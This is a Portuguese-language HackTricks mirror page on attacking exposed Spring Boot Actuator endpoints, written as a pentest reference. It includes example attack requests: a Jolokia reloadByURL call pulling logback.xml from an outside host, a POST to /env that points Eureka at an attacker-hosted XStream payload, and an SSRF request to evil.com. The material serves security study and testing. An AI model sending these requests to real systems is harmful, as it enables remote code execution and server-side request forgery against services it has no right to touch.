mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 09:34:03 +00:00
4.7 KiB
4.7 KiB
Spring Actuators
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o swag oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.
Burla de Autenticação Spring
De https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Explorando Spring Boot Actuators
Verifique a postagem original em [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Pontos Chave:
- Os Actuators do Spring Boot registram endpoints como
/health
,/trace
,/beans
,/env
, etc. Nas versões de 1 a 1.4, esses endpoints são acessíveis sem autenticação. A partir da versão 1.5 em diante, apenas/health
e/info
são não sensíveis por padrão, mas os desenvolvedores frequentemente desabilitam essa segurança. - Certos endpoints do Actuator podem expor dados sensíveis ou permitir ações prejudiciais:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
e/heapdump
.- No Spring Boot 1.x, os actuators são registrados sob a URL raiz, enquanto no 2.x, eles estão sob o caminho base
/actuator/
.
Técnicas de Exploração:
- Execução Remota de Código via '/jolokia':
- O endpoint do actuator
/jolokia
expõe a Biblioteca Jolokia, que permite acesso HTTP aos MBeans. - A ação
reloadByURL
pode ser explorada para recarregar configurações de log de uma URL externa, o que pode levar a XXE cego ou Execução Remota de Código via configurações XML manipuladas. - URL de exploração de exemplo:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
- Modificação de Configuração via '/env':
- Se as Bibliotecas Spring Cloud estiverem presentes, o endpoint
/env
permite a modificação de propriedades ambientais. - As propriedades podem ser manipuladas para explorar vulnerabilidades, como a vulnerabilidade de desserialização XStream no serviçoURL Eureka.
- Exemplo de solicitação POST de exploração:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Outras Configurações Úteis:
- Propriedades como
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
espring.datasource.tomcat.max-active
podem ser manipuladas para vários exploits, como injeção de SQL ou alteração de strings de conexão de banco de dados.
Informações Adicionais:
- Uma lista abrangente de actuators padrão pode ser encontrada aqui.
- O endpoint
/env
no Spring Boot 2.x usa formato JSON para modificação de propriedades, mas o conceito geral permanece o mesmo.
Tópicos Relacionados:
- RCE Env + H2:
- Detalhes sobre a exploração da combinação do endpoint
/env
e do banco de dados H2 podem ser encontrados aqui.
- SSRF no Spring Boot Através da Interpretação Incorreta de Nomes de Caminho:
- O tratamento de parâmetros de matriz (
;
) do framework Spring em nomes de caminho HTTP pode ser explorado para Solicitação de Servidor-Side Request Forgery (SSRF). - Exemplo de solicitação de exploração:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close